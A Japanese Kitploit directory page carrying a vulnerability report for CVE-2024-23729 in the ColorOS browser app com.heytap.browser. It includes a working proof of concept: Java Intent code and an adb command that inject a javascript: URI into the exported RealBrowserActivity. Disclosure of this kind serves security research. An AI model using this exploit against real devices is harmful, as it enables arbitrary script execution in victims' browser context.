Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
com.heytap.browser — CVE-2024-23729 | Kitploit
ツール/GitHubGitHub/actuator/com.heytap.browser
Androidセキュリティ脆弱性分析エクスプロイトウェブアプリケーション悪用モバイルセキュリティ
GitHubactuator/com.heytap.browser

com.heytap.browser

CVE-2024-23729

リポジトリを見る
81年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

脆弱性レポート

概要:

Androidプラットフォーム上の com.heytap.browser アプリケーションに脆弱性が発見されました。この脆弱性により、攻撃者は権限を一切必要とせずに、アプリケーションのコンテキスト内で任意のJavaScriptコードを実行できます。

アプリケーションの詳細:

  • ベンダー: - ColorOS
  • アプリケーション名: 'Internet Browser' com.heytap.browser
  • バージョン: 45.10.3.4.1
  • コンポーネント: com.android.browser.RealBrowserActivity

脆弱性の詳細:

  • 脆弱性の種類: JavaScriptコード実行
  • 攻撃経路: エクスポートされたアクティビティコンポーネント経由
  • 必要な権限: なし

説明:

com.heytap.browser アプリの com.android.browser.RealBrowserActivity アクティビティはエクスポートされており、権限を必要とせずに任意のサードパーティアプリケーションから呼び出すことができます。悪意のあるアプリはこれを悪用して、`com.heytap.browser`` アプリのコンテキスト内で任意のJavaScriptコードを実行できます。

概念実証(PoC):

root@kitploit:~
{
        super.onCreate(savedInstanceState);

        String javaScriptCommand = "javascript:alert%28%27Test%20Alert%27%29%3B";

        Intent intent = new Intent(Intent.ACTION_VIEW);
        intent.setData(Uri.parse(javaScriptCommand));
        intent.setClassName("com.heytap.browser", "com.android.browser.RealBrowserActivity");

        startActivity(intent);

        finish();
    }
root@kitploit:~

adb shell am start -a android.intent.action.VIEW -d "javascript:alert%28%27Test%20Alert%27%29%3B" -n com.heytap.browser/com.android.browser.RealBrowserActivity

com heytap browser- 45 10 3 4 1-JS poc-coloros

影響:

悪用に成功すると、攻撃者は以下を実行できます:

  • com.heytap.browser アプリのコンテキスト内で任意のJavaScriptコードを実行する。
ツールをダウンロード